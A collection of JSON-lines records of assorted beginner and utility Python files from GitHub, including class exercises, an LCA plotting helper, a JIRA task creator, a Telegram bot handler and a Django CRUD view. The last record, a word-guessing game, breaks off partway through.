+{"seq_id":"71027169332","text":"#!/usr/bin/python3\n\n\n\"\"\"\nbase.py - This module contains the Base class\n\"\"\"\n\nimport json\nimport csv\nimport turtle\n\n\nclass Base:\n \"\"\"\n Base - The base class to manage the 'id' attribute\n \"\"\"\n\n __nb_objects = 0\n\n def __init__(self, id=None):\n \"\"\"\n Constructor for the Base class.\n\n Args:\n id (int, optional): The id to assign to the 'id' attribute\n \"\"\"\n if id is not None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\"\n Convert a list of dictionaries to a JSON string representation.\n\n Args:\n list_dictionaries (list): A list of dictionaries.\n\n Returns:\n str: A JSON string representation of the list of dictionaries.\n \"\"\"\n if list_dictionaries is None or len(list_dictionaries) == 0:\n return \"[]\"\n return json.dumps(list_dictionaries)\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\"\n Save a list of instances to a JSON file.\n\n Args:\n list_objs (list): A list of instances that inherit from Base.\n\n Note:\n The filename will be <Class name>.json - example: Rectangle.json.\n If list_objs is None, an empty list will be saved\n The file will be overwritten if it already exists.\n \"\"\"\n filename = cls.__name__ + \".json\"\n if list_objs is None:\n list_objs = []\n list_dicts = [obj.to_dictionary() for obj in list_objs]\n json_string = cls.to_json_string(list_dicts)\n with open(filename, 'w') as file:\n file.write(json_string)\n\n @staticmethod\n def from_json_string(json_string):\n \"\"\"\n Convert a JSON string representation to a list of dictionaries\n\n Args:\n json_string (str): A string representing a list of dictionaries.\n\n Returns:\n list: A list represented by json_string.\n \"\"\"\n if json_string is None or len(json_string) == 0:\n return []\n return json.loads(json_string)\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\"\n Create an instance with all attributes already set.\n\n Args:\n **dictionary: A dictionary containing attribute names and values.\n\n Returns:\n object: An instance with all attributes set.\n \"\"\"\n if cls.__name__ == \"Rectangle\":\n dummy = cls(1, 1)\n elif cls.__name__ == \"Square\":\n dummy = cls(1)\n else:\n dummy = None\n\n dummy.update(**dictionary)\n return dummy\n\n @classmethod\n def load_from_file(cls):\n \"\"\"\n Load instances from a JSON file.\n\n Returns:\n list: A list of instances.\n \"\"\"\n filename = cls.__name__ + \".json\"\n try:\n with open(filename, 'r') as file:\n json_string = file.read()\n list_dicts = cls.from_json_string(json_string)\n return [cls.create(**dictionary) for dictionary in list_dicts]\n except FileNotFoundError:\n return []\n\n @classmethod\n def save_to_file_csv(cls, list_objs):\n if list_objs is None:\n list_objs = []\n filename = cls.__name__ + \".csv\"\n with open(filename, 'w', newline='') as file:\n writer = csv.writer(file)\n for obj in list_objs:\n if cls.__name__ == \"Rectangle\":\n writer.writerow([obj.id, obj.width, obj.height, obj.x, obj.y])\n elif cls.__name__ == \"Square\":\n writer.writerow([obj.id, obj.size, obj.x, obj.y])\n\n @classmethod\n def load_from_file_csv(cls):\n filename = cls.__name__ + \".csv\"\n try:\n with open(filename, 'r', newline='') as file:\n reader = csv.reader(file)\n obj_list = []\n for row in reader:\n row = [int(val) for val in row]\n if cls.__name__ == \"Rectangle\":\n obj = cls(1, 1)\n obj.id, obj.width, obj.height, obj.x, obj.y = row\n elif cls.__name__ == \"Square\":\n obj = cls(1)\n obj.id, obj.size, obj.x, obj.y = row\n obj_list.append(obj)\n return obj_list\n except FileNotFoundError:\n return []\n\n @staticmethod\n def draw(list_rectangles, list_squares):\n screen = turtle.Screen()\n screen.bgcolor(\"white\")\n\n for rect in list_rectangles:\n t = turtle.Turtle()\n t.speed(1)\n t.penup()\n t.goto(rect.x, rect.y)\n t.pendown()\n for _ in range(2):\n t.forward(rect.width)\n t.left(90)\n t.forward(rect.height)\n t.left(90)\n\n for sq in list_squares:\n t = turtle.Turtle()\n t.speed(1)\n t.penup()\n t.goto(sq.x, sq.y)\n t.pendown()\n for _ in range(4):\n t.forward(sq.size)\n t.left(90)\n\n turtle.done()\n","repo_name":"billwk254/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8766503353","text":"def reverseString1(str):\n return str[::-1]\n\n# use stack to solve problem\ndef reverseString2(str):\n stack = []\n for ch in str:\n stack.append(ch)\n\n result = \"\"\n while len(stack) > 0:\n result += stack.pop()\n\n return result","repo_name":"leeyulkyu/giveMeAChance","sub_path":"reverseString.py","file_name":"reverseString.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36945657535","text":"import random\n\nclass Room():\n def __init__(self, room_id):\n self.room_id = room_id\n self.host_id = None\n self.users = []\n self.options = {\n 'ripple_time' : 3,\n 'cooldown' : 0,\n 'send_image' : True,\n 'show_id' : False,\n 'dark_mode' : False\n }\n \n @staticmethod\n def generate_hash(length):\n h = ''\n for _ in range(length):\n d = chr(random.randint(48,57))\n u = chr(random.randint(65,90))\n l = chr(random.randint(97,122))\n h += random.choice([d,u,l])\n return h\n\nif __name__ == '__main__':\n print(Room.generate_hash(5))\n","repo_name":"Tajam/ripple-diary","sub_path":"room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29099589184","text":"import random\r\n\r\nsalaires = 12\r\nyear = 0\r\nlistesalaires = []\r\nshuffle = 0\r\n\r\nfor i in range(salaires):\r\n wallet = random.randint(0, 10000)\r\n print(wallet)\r\n if wallet < 5000:\r\n print(\"Vous avez moins de 5000 euros ce mois-ci\")\r\n elif wallet >= 5000:\r\n print(\"Vous avez 5000 euros ou plus!\")\r\n year += wallet\r\n listesalaires.append(year)\r\n\r\nprint(\"Cette année, vous avez eu \", year, \" euros !\")\r\nbinary = bin(year)\r\nprint(\"En binaire\", year,\" s'écrit \", binary, \" !\")\r\n\r\ndef rappel() :\r\n shuffle = random.randint(1, 2)\r\n if shuffle ==1:\r\n print(\"Voici la liste des salaires de cette année : \", listesalaires)\r\n elif shuffle ==2:\r\n random.shuffle(listesalaires)\r\n print(\"Voici la liste des salaires de cette année dans le désordre : \", listesalaires)\r\n\r\ndef longueur (a):\r\n print(\"Le mot contient\", len(a), \" caractères\")\r\n\r\nlongueur(\"Informatique\")\r\nrappel()\r\n","repo_name":"matteolg/nsiworks","sub_path":"matt.py","file_name":"matt.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42218079054","text":"import brightway2 as bw\nimport numpy as np\nimport pandas as pd\nimport itertools\n\nimport bokeh.io\nimport bokeh.plotting\nimport bokeh.models.tools\nimport bokeh.layouts\nimport bokeh.models\nfrom bokeh.palettes import Category10_10 as palette\nfrom bokeh.transform import dodge\n\n\n\n# bokeh constants\nwidth = 900\nheight = 300\n\n\ndef getILCDMethods():\n aoMethods = [m for m in bw.methods if \"ILCD\" in str(m) and \"2018\" in str(m) and \"LT\" not in str(m)]\n return aoMethods\n\ndef doLCA(oActivity, aoMethods, HHV=None):\n if HHV:\n functional_unit = {oActivity:1/HHV}\n else:\n functional_unit = {oActivity:1}\n oLCA = bw.LCA(functional_unit, aoMethods[0])\n oLCA.lci()\n oLCA.lcia()\n dScores = {aoMethods[0]:oLCA.score}\n for oMethod in aoMethods[1:]:\n oLCA.switch_method(oMethod)\n oLCA.lcia()\n dScores[oMethod] = oLCA.score\n return dScores, oLCA\n\n\ndef compareStaticLCA_interactive(dScores1, dScores2, sFileName=\"static_LCA_comparison.html\", legend1=None, legend2=None):\n\n # check if same methods have been used, abort if not\n if not dScores1.keys() == dScores2.keys():\n print(\"Methods are different. Comparison invalid.\")\n return\n\n # plot layout options\n bar_width = 0.5\n\n # extract method names, units\n ltMethods = [m for m in dScores1.keys()]\n lsUnits = [bw.Method(m).metadata[\"unit\"] for m in dScores1.keys()]\n lsNames = [\", \".join(bw.Method(m).name) for m in dScores1.keys()]\n lsMethodLabels = lsNames\n\n # normalized values\n normalized_v1 = np.array([np.sign(v) for v in dScores1.values()])\n normalized_v2 = np.array([np.sign(v2)*np.abs(v2/v1) for v1, v2 in zip(dScores1.values(), dScores2.values())])\n\n # bar labels = actual values\n lsBarLabels1 = [\"%.2e \" % v + unit for v, unit in zip(dScores1.values(), lsUnits)]\n lsBarLabels2 = [\"%.2e \" % v + unit for v, unit in zip(dScores2.values(), lsUnits)]\n\n # putting it all together\n source1 = bokeh.models.ColumnDataSource(\n data=dict(\n y=normalized_v1,\n method=lsMethodLabels,\n value=lsBarLabels1,\n methods = ltMethods\n )\n )\n source2 = bokeh.models.ColumnDataSource(\n data=dict(\n y=normalized_v2,\n method=lsMethodLabels,\n value=lsBarLabels2,\n methods = ltMethods\n )\n )\n\n TOOLTIPS = [\n (\"method\", \"@method\"),\n (\"value\", \"@value\")\n ]\n\n # plot\n f = bokeh.plotting.figure(x_axis_label=\"indicator\", y_axis_label='normalized impact [-]',\n plot_width=width, plot_height=height*3, tooltips = TOOLTIPS,\n x_range=bokeh.models.FactorRange(*ltMethods))\n p1 = f.vbar(x=\"methods\", top=\"y\", width=bar_width, color=palette[0], alpha=0.6, source=source1)\n p2 = f.vbar(x=dodge('methods', bar_width/2, range=f.x_range), top=\"y\", width=bar_width, color=palette[1], alpha=0.6, source=source2)\n\n # build legend\n legend = bokeh.models.Legend(items=[\n (legend1, [p1]),\n (legend2, [p2]),\n ], location=\"center\", orientation=\"horizontal\", label_width=75)\n f.add_layout(legend, 'above')\n\n # font sizes\n font_size = \"15pt\"\n f.xaxis.axis_label_text_font_size = \\\n f.yaxis.axis_label_text_font_size = \\\n f.xaxis.major_label_text_font_size = \\\n f.yaxis.major_label_text_font_size = \\\n f.legend.label_text_font_size = font_size\n\n # x label rotation\n f.xaxis.major_label_orientation = np.pi / 2\n\n # add tool for strict y-axis zoom\n f.add_tools(bokeh.models.WheelZoomTool(dimensions=\"height\"))\n\n # show the results\n bokeh.io.output_notebook()\n bokeh.io.show(f)\n pass\n\n\ndef plotContributionAnalysis(dContributions, sFileName, lsFromActivities=None, sDatabase=None, bLegend=True, fCutOff=0.005):\n\n oParentActivity = list(dContributions.values())[0][0][\"from\"][0]\n\n # find contributions, save in list\n ldMethodActContrib = []\n for oMethod, ldContributions in dContributions.items():\n\n # break down contributions to\n # a) direct contributions to parent activity if no names supplied\n # b) contributions from activities originating in databases which are not sDatabase\n # c) contributions of activities supplied by user, if names are given\n if lsFromActivities:\n direct_contributions = [c for c in ldContributions if c[\"from\"][-1][\"name\"] in lsFromActivities]\n elif sDatabase:\n direct_contributions = [\n c for c in ldContributions if (\n c[\"from\"][-1].get(\"database\",\"\") != sDatabase and\n c[\"to\"][-1].get(\"database\",\"\") == sDatabase and\n not bool(c[\"to\"][-1].get(\"aggregate\",False))\n ) or (\n bool(c[\"from\"][-1].get(\"aggregate\", False))\n )\n ]\n else:\n direct_contributions = [c for c in ldContributions if c[\"to\"] == [oParentActivity]]\n\n\n # save method name, activity name, relative contribution to impact in dictionary\n fuGetName = lambda x: \\\n (x[\"from\"][-1][\"database\"] == \"biosphere3\") * x[\"to\"][-1][\"name\"] +\\\n (x[\"from\"][-1][\"database\"] != \"biosphere3\") * x[\"from\"][-1][\"name\"]\n ld = [{\n \"method\":oMethod,\n \"activity\":fuGetName(a).replace(\"{\",\"(\").replace(\"}\",\")\").replace(\"|\",\", \"), # replace {} from simapro activities to prevent errors\n \"contribution\": np.sign(a[\"global impact\"]) * abs(a[\"global impact\"] / ldContributions[0][\"global impact\"])\n } for a in direct_contributions]\n\n ldMethodActContrib += ld\n\n # make dataframe from list of dict\n dfContributions = pd.DataFrame(ldMethodActContrib)\n dfContributions = dfContributions.groupby(['method', 'activity']).sum().reset_index()\n\n # remove entries smaller than cutoff\n dfContributions = dfContributions[dfContributions[\"contribution\"].abs() >= fCutOff*abs(dfContributions[\"contribution\"].max())]\n\n # pivot, replace 0 with nan\n dfPivoted = dfContributions.pivot(index=\"method\", columns=\"activity\", values=\"contribution\")\n dfPivoted.fillna(0, inplace=True)\n\n # creating necessary dicts and lists for bokeh plot\n data_pos = {c : dfPivoted[c].values * (dfPivoted[c].values > 0) for c in dfPivoted.columns}\n data_neg = {c : dfPivoted[c].values * (dfPivoted[c].values < 0) for c in dfPivoted.columns}\n methods = dfContributions[\"method\"].unique()\n activities = dfPivoted.columns\n colors = [c for a, c in zip(activities, itertools.cycle(palette))]\n data_neg[\"methods\"] = data_pos[\"methods\"] = methods\n source1 = bokeh.models.ColumnDataSource(data=data_pos)\n source2 = bokeh.models.ColumnDataSource(data=data_neg)\n TOOLTIPS = [\n (\"method\", \"@methods\"),\n (\"activity\", \"$name\"),\n (\"contribution\", \"@$name\")\n ]\n\n # plot contributions per category\n f = bokeh.plotting.figure(x_axis_label=\"indicator\", y_axis_label='contribution to impact [-]',\n plot_width=width, plot_height=height*3, tooltips = TOOLTIPS,\n x_range=bokeh.models.FactorRange(*methods))\n p1 = f.vbar_stack(activities, x=\"methods\", width=0.5, alpha=0.6, fill_color=colors, line_color=\"white\", source=source1)\n f.vbar_stack(activities, x=\"methods\", width=0.5, alpha=0.6, fill_color=colors, line_color=\"white\", source=source2)\n\n # x label rotation\n f.xaxis.major_label_orientation = np.pi / 2\n\n # build legend\n if bLegend:\n legend = bokeh.models.Legend(items=[(l,[p]) for l,p in zip(activities,p1)], location=\"center\")\n f.add_layout(legend, 'above')\n\n # font sizes\n font_size = \"15pt\"\n f.xaxis.axis_label_text_font_size = \\\n f.yaxis.axis_label_text_font_size = \\\n f.xaxis.major_label_text_font_size = \\\n f.yaxis.major_label_text_font_size = \\\n f.legend.label_text_font_size = font_size\n\n # add tool for strict y-axis zoom\n f.add_tools(bokeh.models.WheelZoomTool(dimensions=\"height\"))\n\n # show the results\n bokeh.io.output_notebook()\n bokeh.io.show(f)\n\n pass\n","repo_name":"BenPortner/indirect_land_use_change_PV_corn","sub_path":"helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":8134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38509437922","text":"import csv\nfrom jira import client\nimport logging\n\n\nLG = logging.getLogger(__name__)\n\nTASK_TEMPLATE = \"\"\"h2. Requirements\n\nA description of the requirements for this item: This could include all or any of:\n* use cases\n* functional requirements\n* non-functional requirements\n* describe missing tests\n\nh2. Completion Criteria\n\nThis should list, preferably in bullet form, all of the criteria for completion of this task. Once these items have been met, the task is complete.\n\"\"\"\n\n\nclass ReleaseIssues:\n \"\"\"Reads issues from CSV\"\"\"\n\n def __init__(self, input_file):\n self._current = 0\n self._header = None\n self._tasks = None\n with open(input_file, 'rb') as csvfile:\n test_reader = csv.reader(csvfile)\n for row in test_reader:\n if self._header is None:\n self._header = [x.lower() for x in row]\n self._tasks = []\n continue\n\n record = dict(zip(self._header, row))\n self._tasks.append(record)\n\n @property\n def tasks(self):\n return self._tasks\n\n\n\n\ndef run(parsed_args):\n \"\"\"Execute release task creation\n\n parsed_args: command line arguemnts\"\"\"\n\n assert parsed_args.server\n assert parsed_args.user\n assert parsed_args.password\n assert parsed_args.ticket_file\n assert parsed_args.epic\n\n jira = None\n if not parsed_args.dry_run:\n jira = client.JIRA(server=parsed_args.server,\n basic_auth=(parsed_args.user, parsed_args.password))\n\n r = ReleaseIssues(parsed_args.ticket_file)\n for t in r.tasks:\n try:\n description = TASK_TEMPLATE\n issue_dict = {\n 'project': t.get('project'),\n 'summary': t.get('summary'),\n 'description': description,\n 'issuetype': {'name': 'Task'},\n # 'fixVersion': t.get('fixVersion'),\n # 'priority': t.get('priority'),\n }\n LG.error(issue_dict)\n if jira is not None:\n new_issue = jira.create_issue(fields=issue_dict)\n jira.add_issues_to_epic(parsed_args.epic, [new_issue.key])\n print('%s,%s' % (new_issue.key, new_issue.summary))\n except Exception as e:\n print('Unable to add issue: %s' % e)\n print('Unable to issue: %s' % t)\n","repo_name":"delapsley/relman","sub_path":"relman/cmd/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32707350020","text":"#!/usr/bin/env python3\nimport copy\nimport functools\nimport json\nimport itertools\nimport utils\nimport math\nfrom dataclasses import dataclass\nfrom typing import Tuple, List\n\n\n@dataclass\nclass NodePointer:\n value: object\n index: int\n level: int\n _position: Tuple[List, int]\n\n @property\n def is_primitive(self):\n return type(self.value) == int\n\n @property\n def is_regular(self):\n return type(self.value) == list and all(type(v) == int for v in self.value)\n\n def replace(self, new_value):\n lst, idx = self._position\n lst[idx] = new_value\n\n\ndef pointers(value, level=0, counter=None):\n counter = counter or itertools.count()\n for i, elem in enumerate(value):\n yield NodePointer(elem, next(counter), level + 1, (value, i))\n if type(elem) != int:\n yield from pointers(elem, level + 1, counter)\n\n\ndef try_explode(value):\n left_ptr = None\n exploded_ptr = None\n right_ptr = None\n\n for ptr in pointers(value):\n if exploded_ptr is None:\n if ptr.is_primitive:\n left_ptr = ptr\n elif ptr.level == 4 and ptr.is_regular:\n exploded_ptr = ptr\n elif ptr.index > exploded_ptr.index + 2 and ptr.is_primitive:\n right_ptr = ptr\n break\n\n if exploded_ptr:\n a, b = exploded_ptr.value\n if left_ptr:\n left_ptr.replace(left_ptr.value + a)\n if right_ptr:\n right_ptr.replace(right_ptr.value + b)\n exploded_ptr.replace(0)\n return True\n return False\n\n\ndef try_split(value):\n for ptr in pointers(value):\n if ptr.is_primitive and ptr.value >= 10:\n value = ptr.value\n ptr.replace([int(math.floor(value / 2)), int(math.ceil(value / 2))])\n return True\n return False\n\n\ndef sf_reduce(value):\n while True:\n if try_explode(value):\n continue\n if try_split(value):\n continue\n return\n\n\ndef sf_add(a, b):\n result = [copy.deepcopy(a), copy.deepcopy(b)]\n sf_reduce(result)\n return result\n\n\ndef magnitude(elem):\n if type(elem) == int:\n return elem\n else:\n a, b = elem\n return 3 * magnitude(a) + 2 * magnitude(b)\n\n\ndef main():\n numbers = [json.loads(line.strip()) for line in utils.input()]\n result = functools.reduce(sf_add, numbers)\n print(result)\n print(magnitude(result))\n magnitudes = (magnitude(sf_add(a, b)) for a, b in itertools.permutations(numbers, 2))\n print(max(magnitudes))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"technocoreai/aoc2021","sub_path":"aoc18.py","file_name":"aoc18.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17942440186","text":"# с помощью данной функции, мы находим периметр всех имеющихся островов на карте.\n# сложность: O(m * n).\n\nclass Solution:\n def islandPerimeter(self, grid: List[List[int]]) -> int:\n\n # задаем переменную для результата\n perimeter = 0\n\n # создаем переменные для колонок и рядов\n height, weight = len(grid), len(grid[0])\n\n # циклами проходим по всем элементам на карте\n for row in range(height):\n for column in range(weight):\n\n # присваиваем каждому острову периметр 4\n if grid[row][column]:\n perimeter += 4\n\n # если над островом есть еще остров, то вычитаем 2\n if row and grid[row-1][column]:\n perimeter -= 2\n\n # если слева острова есть еще остров, то вычитаем 2\n if column and grid[row][column-1]:\n perimeter -= 2\n\n return perimeter\n","repo_name":"blinmakersha/HW_algorithm_1_semestr","sub_path":"HW_3/fifth_task.py","file_name":"fifth_task.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28798301033","text":"from telegram import Update, ReplyKeyboardMarkup\nfrom telegram.ext import ContextTypes, CommandHandler, MessageHandler, filters, ConversationHandler\nimport word as w\nfrom home_markup import markup, goHome\n\n# /add 관련 state 설정\nSEARCH_ITEM, APPLY_ITEM = range(2)\n\nasync def add_command(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await update.message.reply_text(\"가격변동 알리미 🔔\\n검색어를 상세하게 입력해주세요 🔍\\n최대 15개의 상품이 조회됩니다.\")\n return SEARCH_ITEM\n\n\n# 아이템 검색\nasync def search_list(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await update.message.reply_text(\"상품을 검색중입니다. 잠시만 기다려주세요 🔍\")\n # 검색이 됐다고 가정을 하는 리스트\n data_list = [\n [\"등록완료\"],\n [\"아이패드 프로 12.9 5세대 M1^_^v_\"],\n [\"아이패드 프로 11인치 3세대 M1^_^v_\"],\n [\"아이패드 거치대^_^v_\"],\n [\"아이패드 미니 6세대 64Gb 와이파이^_^v_\"],\n [\"에러발생용 미니 6세대 64Gb 와이파이\"]\n ]\n reply_list = ReplyKeyboardMarkup(data_list, one_time_keyboard=False)\n await update.message.reply_text(\"알림 받기 원하는 상품을 클릭해주세요 🔔\\n여러개 선택이 가능하며, 모두 선택 후 완료 버튼을 눌러주세요 😊\", reply_markup=reply_list)\n return APPLY_ITEM\n\n\n# 아이템 등록\nasync def add_item(update: Update, context: ContextTypes.DEFAULT_TYPE):\n message = update.message.text\n\n if(w.PARSER in message):\n try:\n await update.message.reply_text(\"선택상품 등록 완료 :: {}\".format(message))\n except:\n await update.message.reply_text(\"등록중 오류가 발생했습니다 🚫\\n🔽 키보드 왼쪽 메뉴를 이용해주세요\", reply_markup=markup)\n return ConversationHandler.END\n else:\n await goHome(update=update)\n return ConversationHandler.END\n\n\nasync def done_add_item(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await goHome(update=update)\n return ConversationHandler.END\n\n\nasync def error_task(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await goHome(update=update)\n return ConversationHandler.END\n\n\n# 핸들러 설정\nconv_handler = ConversationHandler(\n entry_points=[CommandHandler(\"add\", add_command)],\n states={\n # 아이템 검색\n SEARCH_ITEM: [\n MessageHandler(filters.TEXT, search_list)\n ],\n # 아이템 등록\n APPLY_ITEM: [\n # 1. 등록완료\n MessageHandler(filters.Regex(\"^({})$\".format(w.ADD_DONE)), done_add_item ),\n # 2. 계속등록\n MessageHandler(filters.TEXT & ~(filters.COMMAND), add_item)\n ]\n },\n fallbacks=[MessageHandler(filters.TEXT, error_task)],\n )","repo_name":"flxh4894/python_study","sub_path":"handler/custom_add_handler.py","file_name":"custom_add_handler.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2796965640","text":"# Write a function named unique_common that accepts two lists both of which contain integers as parameters and returns a sorted list (ascending order) which contains unique common elements from both the lists. If there are no common elements between the two lists, then your function should return the keyword None\n#\n# For example, if two of the lists received by the function are:\n#\n# ([5, 6, -7, 8, 8, 9, 9, 10], [2, 4, 8, 8, 5, -7])\n#\n# You can see that elements 5, -7, and 8 are common in both the first list and the second list and that the element 8 occurs twice in both lists. Now you should return a sorted list (ascending order) of unique common elements like this:\n#\n# [-7, 5, 8]\n#\n# if the two lists received by the function are:\n#\n# ([5, 6, 7, 0], [3, 2, 3, 2])\n#\n# Since, there are no common elements between the two lists, your function should return the keyword\n#\n#None\n#\n# compara los elementos entre a y b\ndef unique_common(a, b):\n lista_extendida=[]\n for x in a:\n if x in b:\n lista_extendida.append(x)\n evalua_funcion_lista_depurada = funcion_lista_depurada(lista_extendida)\n if evalua_funcion_lista_depurada!=[]:\n return evalua_funcion_lista_depurada\n\n# Funcion recibe lista completa y elimina numeros repetidos\ndef funcion_lista_depurada(lista_extendida):\n lista_final = []\n for i in lista_extendida:\n if i not in lista_final:\n lista_final.append(i)\n lista_final.sort()\n registros = int(len(lista_final)) \n #return lista_final, registros\n return lista_final\n \n# OJO SOLO LA FUNCION!!!\n# Main Program #\na = [1,2,3,4,5,6,5,7,8,9,-1]\nb = [4,9,10,12,-1,5,13,1]\nevalua_unique_common = unique_common(a, b) \nprint(evalua_unique_common)\n","repo_name":"ivanromanv/manuales","sub_path":"Python/Edx_Course/Introduction to Programming Using Python/Excercises/W5_Midterm Exam_elementos_comunes_unicos.py","file_name":"W5_Midterm Exam_elementos_comunes_unicos.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25855823010","text":"from django.http import JsonResponse\nimport json\n\n# 导入 city \nfrom common.models import Citylog\n\ndef dispatcher(request):\n # 将请求参数统一放入request 的 params 属性中,方便后续处理\n\n # GET请求 参数在url中,同过request 对象的 GET属性获取\n if request.method == 'GET':\n request.params = request.GET\n\n # POST/PUT/DELETE 请求 参数 从 request 对象的 body 属性中获取\n elif request.method in ['POST','PUT','DELETE']:\n # 根据接口,POST/PUT/DELETE 请求的消息体都是 json格式\n request.params = json.loads(request.body)\n\n\n # 根据不同的action分派给不同的函数进行处理\n action = request.params['action']\n if action == 'list_city':\n return listcities(request)\n elif action == 'add_city':\n return addcity(request)\n elif action == 'modify_city':\n return modifycity(request)\n elif action == 'del_city':\n return deletecity(request)\n\n else:\n return JsonResponse({'ret': 1, 'msg': '不支持该类型http请求'})\n\ndef listcities(request):\n # 返回一个 QuerySet 对象 ,包含所有的表记录\n qs = Citylog.objects.values()\n\n # 将 QuerySet 对象 转化为 list 类型\n # 否则不能 被 转化为 JSON 字符串\n retlist = list(qs)\n\n return JsonResponse({'ret': 0, 'retlist': retlist})\n\ndef addcity(request):\n\n info = request.params['data']\n\n # 从请求消息中 获取要添加客户的信息\n # 并且插入到数据库中\n # 返回值 就是对应插入记录的对象 \n record = Citylog.objects.create(key=info['key'] ,\n time=info['time'])\n\n return JsonResponse({'ret': 0, 'id':record.id})\n\n\ndef modifycity(request):\n\n # 从请求消息中 获取修改客户的信息\n # 找到该客户,并且进行修改操作\n \n cityid = request.params['id']\n newdata = request.params['newdata']\n\n try:\n # 根据 id 从数据库中找到相应的客户记录\n city = Citylog.objects.get(id=cityid)\n except Citylog.DoesNotExist:\n return {\n 'ret': 1,\n 'msg': f'id 为`{cityid}`的城市不存在'\n }\n\n\n if 'key' in newdata:\n city.key = newdata['key']\n if 'time' in newdata:\n city.time = newdata['time']\n\n # 注意,一定要执行save才能将修改信息保存到数据库\n city.save()\n\n return JsonResponse({'ret': 0})\n\ndef deletecity(request):\n\n cityname = request.params['key']\n\n try:\n # 根据 key 从数据库中找到相应的城市记录\n cityinfo = Citylog.objects.get(key=cityname)\n except Citylog.DoesNotExist:\n return {\n 'ret': 1,\n 'msg': f'key 为`{cityname}`的城市不存在'\n }\n\n # delete 方法就将该记录从数据库中删除了\n cityinfo.delete()\n\n return JsonResponse({'ret': 0})","repo_name":"sssjmmm/Microservice-Architecture","sub_path":"backend-projects/bysms/mgr/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17485594882","text":"\"\"\"KVRX URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom . import views\n\nurlpatterns = [\n #Index\n url(r'^$', views.index, name=\"pages_index\"),\n #Hardcoded pages\n url(r'^base', views.base, name=\"pages_base\"), #REMOVE IN PRODUCTION\n url(r'^shows', views.shows, name=\"pages_shows_index\"),\n url(r'^login', views.login, name=\"pages_login\"),\n #Keyword pages\n url(r'^dj/(?P<djName>.+)/$', views.dj_detail, name=\"pages_dj_detail\"),\n url(r'^show/(?P<namegiven>.+)/$', views.show_detail, name=\"pages_show_detail\"),\n #User created pages (CMS)\n url(r'^(?P<p>.+)/$', views.custom_page, name=\"pages_custom_page\"),\n]\n\nadmin.site.site_header = 'KVRX Admin'\nadmin.site.site_title = 'KVRX Admin'","repo_name":"mattjegan/KVRX-Website","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41133462986","text":"\r\n\r\n# Use a dictionary\r\n#\r\nimport random\r\n\r\npoints = 0\r\ntries = 0\r\n\r\nwords = {\r\n \"Love\" :[\"A word for affection.\", \"A feeling of compassion.\", \"A feeling of great interest in something.\", \"A romantic feeling.\"],\r\n \"Endgame\" :[\"The highest grossing movie of all time.\", \"The last movie of one the most watched movie series.\", \"Pepperony's last movie together.\", \"'If I tell you, it wont happen.'\"],\r\n \"Sia\" :[\"He/she is the inspiration of the movie 'Music'.\", \"He/She sang 'Move you body'.\", \"He/She sang 'Elastic heart'.\", \"In his or her song, 'I don't need money.'\"],\r\n \"Church\" :[\"The body of Christ.\", \"A gathering of people who come to worship God.\", \"A place of worship.\", \"The house of God.\"],\r\n \"Gay\" :[\"To be extremely happy.\", \"To be attracted to the same sex.\", \"To be in a romantic relationship with the same sex.\", \"It has the letter 'y'.\"],\r\n \"Game\" :[\"To be ready for something.\", \"To be prepared for something\", \"A state of readiness.\", \"To be prepared.\"],\r\n \"Queen\" :[\"The name of a former popular boy-band.\", \"The female head of a monarchy.\", \"Has double letter 'e'.\", \"The wife of a king.\"]\r\n}\r\n\r\nscores = {} \r\n\r\nkeys = []\r\nfor k in words.keys():\r\n keys.append(k)\r\n\r\nuser_valid_plays = []\r\n\r\nword = 